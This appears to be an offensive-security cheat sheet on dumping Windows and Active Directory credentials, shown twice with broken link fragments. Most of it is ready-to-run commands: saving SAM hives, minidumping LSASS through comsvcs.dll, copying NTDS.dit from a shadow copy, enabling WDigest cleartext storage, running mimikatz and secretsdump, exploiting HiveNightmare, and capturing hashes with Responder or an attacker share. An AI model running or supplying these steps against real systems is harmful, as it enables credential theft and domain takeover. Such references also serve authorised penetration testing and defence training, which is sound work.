Extract Hash & Password

Attacks that allow obtaining NTLM hashes of local users or Active Directory domain users.

General Info

Database

SAM (Security Account Manager)

Hash format

LM (up to Vista Server 2008, 2 DES blocks of 7 lowercase chars, 69 chars total) NTLM (MD4)

Authentication protocols

NTLMv1 (uses LM and NTLM hashes) NTLMv2 (uses NTLM hashes) Kerberos

Process

LSASS (Local Security Authority Subsystem Service), system process dedicated to authentication, access, etc.

NTDS.dit

Each Domain Controller in Active Directory keeps this database file synchronized, which contains a lot of information including usernames and password hashes (SAM is used only for logins on the device with local accounts)

SAM Hashes

To extract hashes from the SAM database we need:

Administrator Privileges
hklm\sam contains the password hashes.
hklm\system contains the bootkey needed to decrypt the SAM db.
hklm\security contains cached credentials for domain accounts.

Get File

Create copies for transfer

reg.exe save hklm\sam C:\sam.save

reg.exe save hklm\system C:\system.save

reg.exe save hklm\security C:\security.save

Extract

secretsdump.py -sam sam.save -system system.save [-security security.save] LOCAL

LSASS Hashes

To extract hashes from the LSASS process we need:

Administrator Privileges
Dump of the running process

Get File

Create a copy for transfer

Task Manager > Right-click on LSAProcess > Create dump file

tasklist /svc or Get-Process lsass
# get PID LSASS

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dump full

Extract

pypykatz lsa minidump lsass.dump

NTDS Hashes

To extract hashes from the NTDS.dit file we need::

Connect to a Domain Controller
Have Local Administrator (Administrators group) or Domain Administrator (Domain Admins group) rights (or equivalent)
hklm\system contains the bootkey needed for decryption

Get File

Create a copy for transfer

vssadmin CREATE SHADOW /For=C:

vshadow.exe -nw -p C:
# get PATH

cmd.exe /c copy <PATH>\Windows\NTDS\NTDS.dit c:\NTDS.dit

Extract

secretsdump.py -ntds NTDS.dit -system system.save LOCAL

UseLogonCredential Registry Key

We need to enable that Registry Key UseLogonCredential to be able to extract Clear Password

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

And reboot

shutdown /r /t 0 /f

Store Password using Reversible Encryption

Enumeration

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

With Tools

Tool

Details

Remotly nxc smb <IP> --local-auth -u <USER> -p <PASS> --sam --lsa nxc smb <IP_DC> -u <USER> -p <PASS> --ntds

On Host (need SeDebugPrivilege active, in addition to administrator privileges)

.\mimikatz.exe

secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC>

Create a copy of the SAM files, System, Security from any user even unprivileged. CVE-2021-36934 - SeriousSam .\HiveNightmare.exe

Sniffing

Tool

Details

Linux sudo responder -I <INTERFACE> sudo responder -I <INTERFACE> -A (passive analysis mode) See /usr/share/responder/logs

Windows PowerShell version (no longer maintained) Import-Module .\Inveigh.ps1 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput YC# version .\Inveigh.exe [ESC] > HELP

If we have access to the target we can use net use \<IP_Attacker>\share

Last updated 14 hours ago

Was this helpful?

Extract Hash & Password

Attacks that allow obtaining NTLM hashes of local users or Active Directory domain users.

General Info

Database

SAM (Security Account Manager)

Hash format

LM (up to Vista Server 2008, 2 DES blocks of 7 lowercase chars, 69 chars total) NTLM (MD4)

Authentication protocols

NTLMv1 (uses LM and NTLM hashes) NTLMv2 (uses NTLM hashes) Kerberos

Process

LSASS (Local Security Authority Subsystem Service), system process dedicated to authentication, access, etc.

NTDS.dit

SAM Hashes

To extract hashes from the SAM database we need:

Administrator Privileges
hklm\sam contains the password hashes.
hklm\system contains the bootkey needed to decrypt the SAM db.
hklm\security contains cached credentials for domain accounts.

Get File

Create copies for transfer

reg.exe save hklm\sam C:\sam.save

reg.exe save hklm\system C:\system.save

reg.exe save hklm\security C:\security.save

Extract

Extracting hashes from the SAM database in offline mode by having the files. Use .

secretsdump.py -sam sam.save -system system.save [-security security.save] LOCAL

LSASS Hashes

To extract hashes from the LSASS process we need:

Administrator Privileges
Dump of the running process

Get File

Create a copy for transfer

Task Manager > Right-click on LSAProcess > Create dump file

tasklist /svc or Get-Process lsass
# get PID LSASS

rundll32 C:\windows\system32\comsvcs.dll, MiniDump <PID> C:\lsass.dump full

Extract

Extracting hashes from the LSASS process dump in offline mode by having the files. Use .

pypykatz lsa minidump lsass.dump

NTDS Hashes

To extract hashes from the NTDS.dit file we need::

Connect to a Domain Controller
Have Local Administrator (Administrators group) or Domain Administrator (Domain Admins group) rights (or equivalent)
hklm\system contains the bootkey needed for decryption

Get File

Create a copy for transfer

vssadmin CREATE SHADOW /For=C:

vshadow.exe -nw -p C:
# get PATH

cmd.exe /c copy <PATH>\Windows\NTDS\NTDS.dit c:\NTDS.dit

Extract

Extract hashes from NTDS.dit file offline, having the files. Use .

secretsdump.py -ntds NTDS.dit -system system.save LOCAL

UseLogonCredential Registry Key

We need to enable that Registry Key UseLogonCredential to be able to extract Clear Password

reg add HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest /v UseLogonCredential /t REG_DWORD /d 1

And reboot

shutdown /r /t 0 /f

Store Password using Reversible Encryption

When this option is set on a user account, the passwords are stored using RC4 encryption with the key stored in the registry (the Syskey) that can be extracted by a Domain Admin or equivalent. Tools such as will decrypt any passwords stored using reversible encryption while dumping the NTDS file either as a Domain Admin or using an attack such as .

Enumeration

Get-ADUser -Filter 'userAccountControl -band 128' -Properties userAccountControl

With PowerView ( and )

Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol

With Tools

Tool

Details

Remotly nxc smb <IP> --local-auth -u <USER> -p <PASS> --sam --lsa nxc smb <IP_DC> -u <USER> -p <PASS> --ntds

On Host (need SeDebugPrivilege active, in addition to administrator privileges)

.\mimikatz.exe

> privilege::debug > lsadump::sam > lsadump::lsa > lsadump::secrets > vault::cred > sekurlsa::credman > sekurlsa::logonpasswords full (see )

For All Moduls see . For RevShell: load kiwi

secretsdump.py <DOMAIN>/<USER>:<PASS>@<DC>

Create a copy of the SAM files, System, Security from any user even unprivileged. CVE-2021-36934 - SeriousSam .\HiveNightmare.exe

Sniffing

Tool

Details

Linux sudo responder -I <INTERFACE> sudo responder -I <INTERFACE> -A (passive analysis mode) See /usr/share/responder/logs

Windows PowerShell version (no longer maintained) Import-Module .\Inveigh.ps1 Invoke-Inveigh Y -NBNS Y -ConsoleOutput Y -FileOutput YC# version .\Inveigh.exe [ESC] > HELP

If we have access to the target we can use net use \<IP_Attacker>\share

Last updated 14 hours ago

Was this helpful?